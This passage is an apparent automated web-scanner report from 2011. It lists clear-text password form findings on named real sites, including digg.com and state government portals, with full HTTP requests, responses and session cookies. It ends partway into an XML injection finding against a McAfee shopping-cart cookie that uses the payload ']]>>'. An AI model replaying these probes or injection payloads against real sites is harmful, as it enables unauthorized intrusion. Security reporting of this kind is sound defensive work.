<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lan
...[SNIP]...
</h2>

<form action="/account" class="commonForm" enctype="multipart/form-data" id="signupForm" method="post"><div style="margin:0;padding:0;display:inline">
...[SNIP]...
</label>
<input autocomplete="off" id="signup_password" name="signup[password]" size="30" type="password" />
</div>
...[SNIP]...
</label>
<input autocomplete="off" id="signup_passwordConfirm" name="signup[passwordConfirm]" size="30" type="password" />
</div>
...[SNIP]...

5.3. http://digg.com/submit  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Sun, 01-May-2011 12:20:09 GMT; path=/; domain=digg.com
Set-Cookie: d=812aa8e869f0d2e7c87704b3fa38f3583a3547de3e2f6866581f174175564be4; expires=Thu, 29-Apr-2021 22:27:49 GMT; path=/; domain=.digg.com
X-Digg-Time: D=24701 10.2.129.157
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8171

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.4. http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/acct_login.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myflorida.custhelp.com
Path:   /cgi-bin/myflorida.cfg/php/enduser/acct_login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /cgi-bin/myflorida.cfg/php/enduser/acct_login.php?p_sid=ql-ywKsk&p_accessibility=0&p_redirect=&p_sp=cF9zcmNoPTEmcF9zb3J0X2J5PSZwX2dyaWRzb3J0PSZwX3Jvd19jbnQ9MCwwJnBfcHJvZHM9JnBfY2F0cz0mcF9wdj0mcF9jdj0mcF9wYWdlPTEmcF9zZWFyY2hfdGV4dD14c3M!&p_srch=1&p_next_page=std_alp.php HTTP/1.1
Host: myflorida.custhelp.com
Proxy-Connection: keep-alive
Referer: http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/std_alp.php?p_lva=&p_li=&p_accessibility=&p_redirect=&p_page=1&p_cv=&p_pv=&p_prods=&p_cats=&p_hidden_prods=&cat_lvl1=0&prod_lvl2=0&prod_lvl1=0&p_search_text=xss&x=25&y=12&p_new_search=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:02:09 GMT
Server: Apache
P3P: policyref="http://myflorida.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=141245 t=1304125329844119
RNT-Machine: 05
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18271

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en_US">
<!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->
...[SNIP]...
</tr>
<form class="minimal" name="_validate" method="post" action="acct_login_submit.php">
<input type="hidden" name="p_sid" value="ql-ywKsk" />
...[SNIP]...
<td><input name="p_passwd" id="p_passwd" type="password" size="20" maxlength="20" /></td>
...[SNIP]...

5.5. http://pa.gov/portal/server.pt  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pa.gov
Path:   /portal/server.pt

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

POST /portal/server.pt? HTTP/1.1
Host: pa.gov
Proxy-Connection: keep-alive
Referer: http://pa.gov/portal/server.pt/gateway%2527/PTARGS_0_2_24662_2966_368351_43/http
Cache-Control: max-age=0
Origin: http://pa.gov
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: plloginoccured=false; REQUESTURLBEFORESSO=; ptLastLoginAuthSource=
Content-Length: 128

in_hi_space=Login&in_hi_spaceID=82&in_hi_control=Login&in_hi_dologin=true&in_tx_username=&in_pw_userpass=&in_se_authsource=cwopa

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Language: en
Set-Cookie: ASP.NET_SessionId=uc2nxa33mmh2xs55wfhh52by; path=/
Expires: 1304080785543
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304167185543
Content-Type: text/html; charset=utf-8
Content-Length: 34484

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>Log In</title><script type="
...[SNIP]...
</table>
<form method="post" action="http://pa.gov/portal/server.pt?" name="lform" id="loginFormID"><table align="center" cellpadding="2" cellspacing="0" width="400">
...[SNIP]...
<td align="left" width="60%" colspan="1" class="loginText"><input type="password" alt="Password:" size="30" class="formInputBoxText" name="in_pw_userpass" id="pt-login-password-field" onkeypress="return executeViaEnter(event);" value=""></input>
...[SNIP]...

5.6. http://www.alabama.gov/portal/index.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.alabama.gov
Path:   /portal/index.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /portal/index.jsp HTTP/1.1
Host: www.alabama.gov
Proxy-Connection: keep-alive
Referer: http://al.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:36:24 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Cache-Control: private
Set-Cookie: JSESSIONID=abcI5QvmCkxSLfmPB1J_s; path=/
Content-Type: text/html
Content-Length: 34756


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<noscript><form action='http://www.alabama.gov/portal_alerts/login_portal.action' method='get' target="_blank"></noscript>
...[SNIP]...
<p>
   password:<input type="password" name="login_password" id="login_password" value="" />
</p>
...[SNIP]...

5.7. http://www.visitflorida.com/floridalive  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /floridalive

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /floridalive HTTP/1.1
Host: www.visitflorida.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:02:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=nf9dmcfmtuh81gq8ojaulkllo7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 465042


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div id="loginPanel">
<form action="/login/section.usermedia" method="post" onsubmit="return mypageUserLogin($('#username').val(),$('#password').val())">
<div class="username">
...[SNIP]...
</label><input type="password" class="empty" name="password" id="password" size="20" /></div>
...[SNIP]...

5.8. http://www.vsea.org/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:12:49 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a33741c30c60faca76c77b41e704af54; expires=Mon, 23 May 2011 01:46:09 GMT; path=/; domain=.vsea.org
Last-Modified: Fri, 29 Apr 2011 22:12:49 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 45383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Ver
...[SNIP]...
<div class="content">
<form action="/node?destination=node" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

5.9. http://www.vsea.org/editorial-lays-out-vermont%26%23039  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /editorial-lays-out-vermont%26%23039

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /editorial-lays-out-vermont%26%23039 HTTP/1.1
Host: www.vsea.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e;

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 12:41:34 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 12:41:34 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...
<div class="content">
<form action="/?destination=editorial-lays-out-vermont" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

5.10. http://www.vsea.org/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 01:22:40 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 01:22:40 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 31785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...
<div class="content">
<form action="/?destination=favicon.ico" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

5.11. http://www.vsea.org/join-vsea  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /join-vsea

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /join-vsea HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:13:10 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 29 Apr 2011 22:13:11 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 34231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Joi
...[SNIP]...
<div class="content">
<form action="/join-vsea?destination=node%2F216" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

5.12. http://www.vsea.org/join-your-union  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /join-your-union

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /join-your-union HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/join-vsea
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:13:24 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 29 Apr 2011 22:13:24 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 39482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Joi
...[SNIP]...
<div class="content">
<form action="/join-your-union?destination=node%2F220" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

5.13. http://www.vsea.org/maine-study-finds-state%26%23039  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /maine-study-finds-state%26%23039

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /maine-study-finds-state%26%23039 HTTP/1.1
Host: www.vsea.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e;

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 12:41:34 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 12:41:34 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...
<div class="content">
<form action="/?destination=maine-study-finds-state" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

5.14. http://www.vsea.org/node  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /node

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /node HTTP/1.1
Host: www.vsea.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:34 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 12:41:34 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Ver
...[SNIP]...
<div class="content">
<form action="/node?destination=node" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

5.15. http://www.vsea.org/purchase-vsea-clothing  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /purchase-vsea-clothing

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /purchase-vsea-clothing HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/join-your-union
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:13:49 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 29 Apr 2011 22:13:49 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 32798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pur
...[SNIP]...
<div class="content">
<form action="/purchase-vsea-clothing?destination=node%2F723" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

5.16. http://www.vsea.org/state-hospital%26%23039  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /state-hospital%26%23039

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /state-hospital%26%23039 HTTP/1.1
Host: www.vsea.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e;

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 12:41:40 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 12:41:40 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...
<div class="content">
<form action="/?destination=state-hospital" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

6. XML injection  previous  next
There are 3 instances of this issue:


6.1. http://us.mcafee.com/root/basket.asp [Currency cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://us.mcafee.com
Path:   /root/basket.asp

Issue detail

The Currency cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the Currency cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /root/basket.asp HTTP/1.1
Host: us.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d266730%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; lBounceURL=http%3A%2F%2Fus%2Emcafee%2Ecom%2Froot%2Fbasket%2Easp%3Faffid%3D0%26; ASPSESSIONIDSQTRCCBC=KPLDIJODDCHEAHCOCAPBNDGC; AffID=0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=en%2Dus; SessionInfo=AffiliateId=0&CampaignId=78228; s_campaign=78228; CampaignId=86873; ASPSESSIONIDSCARSBBC=LPHHDJODOEABGOHIPLKDDJDD; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3CUserContext%3E%3CAffID%3E0%3C%2FAffID%3E%3CAffBuildID%3E0%3C%2FAffBuildID%3E%3C%2FUserContext%3E%0D%0A; 